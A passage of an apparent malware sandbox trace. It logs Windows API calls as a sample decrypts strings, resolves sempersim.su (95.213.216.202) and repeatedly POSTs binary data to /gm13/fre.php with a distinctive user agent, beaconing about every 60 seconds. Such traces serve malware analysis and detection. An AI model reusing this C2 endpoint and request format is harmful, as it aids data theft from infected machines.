pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0215.663] GetProcessHeap () returned 0x620000 [0215.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0215.664] GetProcessHeap () returned 0x620000 [0215.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0215.664] GetProcessHeap () returned 0x620000 [0215.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0215.664] GetProcessHeap () returned 0x620000 [0215.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642d80 [0215.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.665] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.673] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0215.679] GetProcessHeap () returned 0x620000 [0215.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0215.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.680] CryptImportKey (in: hProv=0x63ba90, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0215.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.681] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.683] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.683] GetProcessHeap () returned 0x620000 [0215.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0215.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.687] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642d80, pdwDataLen=0x19fcfc | out: pbData=0x642d80, pdwDataLen=0x19fcfc) returned 1 [0215.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.687] CryptDestroyKey (hKey=0x62d710) returned 1 [0215.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.688] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0215.688] GetProcessHeap () returned 0x620000 [0215.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0215.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0215.689] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0215.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0215.690] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0215.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0215.691] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0215.691] GetProcessHeap () returned 0x620000 [0215.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0215.691] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c168*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0215.694] GetProcessHeap () returned 0x620000 [0215.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b680 [0215.694] socket (af=2, type=1, protocol=6) returned 0x388 [0215.694] connect (s=0x388, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0215.749] FreeAddrInfoW (pAddrInfo=0x63c168*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0215.749] GetProcessHeap () returned 0x620000 [0215.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0215.749] GetProcessHeap () returned 0x620000 [0215.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0215.750] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0215.750] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0215.751] GetProcessHeap () returned 0x620000 [0215.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0215.751] GetProcessHeap () returned 0x620000 [0215.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0215.751] GetProcessHeap () returned 0x620000 [0215.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642fc0 [0215.751] GetProcessHeap () returned 0x620000 [0215.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0215.752] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0215.753] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0215.753] GetProcessHeap () returned 0x620000 [0215.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0215.753] GetProcessHeap () returned 0x620000 [0215.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0215.753] send (s=0x388, buf=0x63a880*, len=237, flags=0) returned 237 [0215.753] send (s=0x388, buf=0x6421e0*, len=159, flags=0) returned 159 [0215.754] GetProcessHeap () returned 0x620000 [0215.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0215.754] recv (in: s=0x388, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0217.266] GetProcessHeap () returned 0x620000 [0217.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0217.267] GetProcessHeap () returned 0x620000 [0217.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0217.267] GetProcessHeap () returned 0x620000 [0217.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0217.267] GetProcessHeap () returned 0x620000 [0217.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0217.268] closesocket (s=0x388) returned 0 [0217.268] GetProcessHeap () returned 0x620000 [0217.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b680 | out: hHeap=0x620000) returned 1 [0217.268] GetProcessHeap () returned 0x620000 [0217.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0217.269] GetProcessHeap () returned 0x620000 [0217.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642d80 | out: hHeap=0x620000) returned 1 [0217.269] GetProcessHeap () returned 0x620000 [0217.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0217.269] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x630) returned 0x388 [0217.271] Sleep (dwMilliseconds=0xea60) [0217.285] GetProcessHeap () returned 0x620000 [0217.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0217.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.286] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.292] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0217.299] GetProcessHeap () returned 0x620000 [0217.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0217.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.303] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0217.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.304] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.305] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.305] GetProcessHeap () returned 0x620000 [0217.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0217.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.306] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0217.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.307] CryptDestroyKey (hKey=0x62d190) returned 1 [0217.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.308] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0217.308] GetProcessHeap () returned 0x620000 [0217.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645858 [0217.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0217.309] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0217.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0217.309] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0217.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0217.310] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0217.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0217.311] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0217.311] GetProcessHeap () returned 0x620000 [0217.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0217.311] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0217.311] GetProcessHeap () returned 0x620000 [0217.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0217.312] GetProcessHeap () returned 0x620000 [0217.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645858 | out: hHeap=0x620000) returned 1 [0217.312] GetProcessHeap () returned 0x620000 [0217.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0217.313] GetProcessHeap () returned 0x620000 [0217.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0217.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.314] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.319] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0217.325] GetProcessHeap () returned 0x620000 [0217.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0217.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.326] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0217.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.327] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.328] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.328] GetProcessHeap () returned 0x620000 [0217.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0217.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.332] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, pdwDataLen=0x19fcfc) returned 1 [0217.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.333] CryptDestroyKey (hKey=0x62d710) returned 1 [0217.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0217.334] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0217.334] GetProcessHeap () returned 0x620000 [0217.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645408 [0217.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0217.334] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0217.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0217.335] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0217.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0217.336] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0217.336] GetProcessHeap () returned 0x620000 [0217.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0217.336] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c0a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0217.338] GetProcessHeap () returned 0x620000 [0217.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b570 [0217.338] socket (af=2, type=1, protocol=6) returned 0x38c [0217.338] connect (s=0x38c, name=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0217.387] FreeAddrInfoW (pAddrInfo=0x63c0a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0217.387] GetProcessHeap () returned 0x620000 [0217.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0217.387] GetProcessHeap () returned 0x620000 [0217.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0217.388] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0217.389] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0217.389] GetProcessHeap () returned 0x620000 [0217.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0217.389] GetProcessHeap () returned 0x620000 [0217.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0217.389] GetProcessHeap () returned 0x620000 [0217.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643200 [0217.390] GetProcessHeap () returned 0x620000 [0217.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0217.391] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0217.391] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0217.391] GetProcessHeap () returned 0x620000 [0217.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0217.392] GetProcessHeap () returned 0x620000 [0217.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0217.392] send (s=0x38c, buf=0x63a880*, len=237, flags=0) returned 237 [0217.392] send (s=0x38c, buf=0x6421e0*, len=159, flags=0) returned 159 [0217.392] GetProcessHeap () returned 0x620000 [0217.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0217.392] recv (in: s=0x38c, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0219.166] GetProcessHeap () returned 0x620000 [0219.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0219.167] GetProcessHeap () returned 0x620000 [0219.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0219.169] GetProcessHeap () returned 0x620000 [0219.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0219.172] GetProcessHeap () returned 0x620000 [0219.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0219.173] closesocket (s=0x38c) returned 0 [0219.174] GetProcessHeap () returned 0x620000 [0219.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b570 | out: hHeap=0x620000) returned 1 [0219.174] GetProcessHeap () returned 0x620000 [0219.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645408 | out: hHeap=0x620000) returned 1 [0219.174] GetProcessHeap () returned 0x620000 [0219.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0219.175] GetProcessHeap () returned 0x620000 [0219.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0219.188] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb94) returned 0x38c [0219.193] Sleep (dwMilliseconds=0xea60) [0219.201] GetProcessHeap () returned 0x620000 [0219.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0219.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0219.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.208] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0219.218] GetProcessHeap () returned 0x620000 [0219.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0219.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.219] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0219.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.220] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0219.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.222] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.222] GetProcessHeap () returned 0x620000 [0219.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0219.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.223] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, pdwDataLen=0x19fcfc) returned 1 [0219.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.224] CryptDestroyKey (hKey=0x62d710) returned 1 [0219.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.225] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0219.225] GetProcessHeap () returned 0x620000 [0219.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0219.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0219.226] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0219.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0219.227] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0219.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0219.228] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0219.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0219.229] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0219.229] GetProcessHeap () returned 0x620000 [0219.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0219.229] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0219.229] GetProcessHeap () returned 0x620000 [0219.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0219.232] GetProcessHeap () returned 0x620000 [0219.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0219.232] GetProcessHeap () returned 0x620000 [0219.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0219.233] GetProcessHeap () returned 0x620000 [0219.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ea0 [0219.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.234] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0219.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.240] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0219.249] GetProcessHeap () returned 0x620000 [0219.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0219.250] LoadLibraryW 